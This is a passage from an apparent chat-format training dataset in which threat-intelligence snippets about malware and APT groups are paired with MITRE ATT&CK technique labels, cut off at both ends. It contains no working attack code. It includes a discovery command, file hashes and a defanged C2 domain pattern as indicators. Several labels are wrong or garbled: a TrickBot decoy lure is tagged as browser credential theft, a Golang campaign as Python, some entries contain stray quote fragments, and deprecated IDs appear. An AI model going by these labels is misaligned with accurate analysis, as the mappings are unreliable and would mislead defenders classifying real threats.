or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM has a function called \"DeleteLeftovers\" to remove certain artifacts of the attack." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a Registry subkey that registers a new system device." }, { "role": "assistant", "content": "T1112 - Modify Registry', 'T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decrypting the strings, they must be further decompressed using LZNT1" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "decrypts code, strings, and commands to use once it's on the victim's machine." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Moses Staff has used obfuscated web shells in their operations." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected" }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has deleted tmp and prefetch files during post compromise cleanup activities." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2.     The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3.     The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing', 'T1106 - Native API', 'T1036 - Masquerading', 'T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS" }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has used tools to download malicious code." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates new services to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The first byte of the string is used as the XOR key to in turn decode the remainder of the data" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 has modules for enumerating domain trusts." }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxxZ can collect the username from a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of deleting Registry keys used for persistence." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor has the ability to download files from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 Table 5" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 uses a custom packing algorithm." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot can download additional files onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can run \"upload\" to decrypt and upload files from storage." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In both cases, Group5 disguised the malicious binaries with several layers of obfuscation, including crypting and packing to reduce the possibility of detection by antivirus software" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TYPEFRAME variants can add malicious DLL modules as new services.TYPEFRAME can also delete services from the victim’s machine." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADFLICK has delayed communication to the actor-controlled IP address by 5 minutes." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim’s machine. Execute the command" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBALL has the ability to download and install a remote payload." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses scripts to enumerate IP ranges on the victim network. has also issued the command net view /domain to a implant to gather information about remote systems on the network." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "By applying two specific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was very similar to the QUADAGENT payloads delivered in the attacks discussed in this blog" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has attempted to lure victims into opening malicious links embedded in emails." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "connects to C2 infrastructure and establishes backdoors over a custom communications protocol." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We see it clustered here with some dynamic domain name system (DNS) domains. Dynamic DNS domains were observed in this cluster on later IP addresses as well, though this technique appears to have fallen out of favor, at least in this context, since there are none in this cluster currently active" }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In Figure 9, below, red indicates targeted IP addresses, malware, registrant information, and domains associated with the targeted attack campaign while blue indicates criminal attack IP addresses, malware used, registrant information, and domains: Figure 9" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NewBCtestDll, NewBCtestnDll Module that is a reverse proxy and is able to execute commands. Module that is a reverse proxy and is able to execute commands. vncDll Module used as a RAT on the victim machine. Module used as a RAT on the victim machine. vpnDll Module used to create VPN proxy routed to a given address. Module used to create VPN proxy routed to a given address. rdpscanDll Module used for brute forcing RDP on a certain list of targets. Module used for brute forcing RDP on a certain list of targets. bcClientDllTestTest An old module used to proxy Trickbot operator traffic through a victim machine. An old module used to proxy Trickbot operator traffic through a victim machine" }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware encrypts C2 traffic using RC4 with a hard-coded key." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets." }, { "role": "assistant", "content": "T1578.002 - Create Cloud Instance" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This indicates that a human operative was executing commands on a command line style interface, rather than an automated or GUI process" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis used the \"IsDebuggerPresent\", \"OutputDebugString\", and \"SetLastError\" APIs to avoid debugging. Denis used \"GetProcAddress\" and \"LoadLibrary\" to dynamically resolve APIs. Denis also used the \"Wow64SetThreadContext\" API as part of a process hollowing process." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Bumblebee loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to sideload the malicious ‘pnipcn.dll’ file" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSInfo queries the registry to look for information about Terminal Services." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the computer name, OS versioning information, and OS install date and sends the information to the C2." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has created Windows tasks to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dust Storm has used Android backdoors capable of enumerating specific files on the infected devices." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting." }, { "role": "assistant", "content": "T1591.004 - Identify Roles" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process." }, { "role": "assistant", "content": "T1055.003 - Thread Execution Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has created social media accounts to monitor news and security trends as well as potential targets." }, { "role": "assistant", "content": "T1585.001 - Social Media Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware launches another thread that scans for new drives attached to the system every three seconds. If a new drive is attached to the system and is not identified as a type CDROM drive, the malware begins the encryption process on the new drive. On new drives attached to the system, the malware may create the directory <Drive_letter>:\\$RECYCLE and execute the following command" }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Use the latest attack patterns, Kubernetes (K8s) or Docker API targeting, which were featured in two reports focusing on TeamTNT operations, Black-T: New Cryptojacking Variant from TeamTNT and Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell has a module to use a rootkit on a system." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has a command to delete a Registry key it uses, \"\\Software\\Microsoft\\Internet Explorer\\notes\"." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download additional files and payloads to compromised hosts." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Octopus has encoded C2 communications in Base64." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Icons were often folders, meant to trick targets into thinking they were opening a shortcut to a folder" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MiniDuke can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remexi utilizes scheduled tasks as a persistence mechanism." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider has used Cobalt Strike to empty log files." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has been known to remove indicators of compromise from tools." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:  [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 “mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files: \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1 \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has used spear phishing to initially compromise victims." }, { "role": "assistant", "content": "T1566 - Phishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally, once infected, the malware cycles through a large list of command and control (C&C) servers embedded within the malware. It appears while the list is extensive, not all of the C&Cs are active and continue to beacon until a successful connection is established. Despite modifying a small part of itself while copying itself across the network as a means to evade detection, the operators have made no effort to change the C&C communication protocol since its first inception" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Word document delivering prompts the user to enable macro execution." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk uses VMProtect to make reverse engineering the malware more difficult." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has run encoded commands from the command line." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuditCred is installed as a new service on the system." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "binds and listens on port 443." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A tool used by the adversary which wasn’t installed on the servers by default, was DSInternals. DSInternals is a PowerShell module that makes use of internal Active Directory features. The files and directories found on various systems of a victim match with DSInternals version 2.16.1. We have found traces that indicate DSInternals was executed and at which time, which match with the rest of the traces of the intrusion. We haven’t recovered traces of how the adversary used DSInternals, but considering the phase of the intrusion the adversary used the tool, it is likely they used it for either account discovery or privilege escalation, or both" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Downloader After the exploit or script executes, the system downloads install.exe, which has the following metadata: MD5             5a0c4e1925c76a959ab0588f683ab437 Size            46592 bytes Compile Time    2014-11-19 08:55:10Z Import Hash     6b8611f8148a6b51e37fd68e75b6a81c The file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path “C:\\Users\\Public”, which fails on Windows XP because that path is not present by default" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ 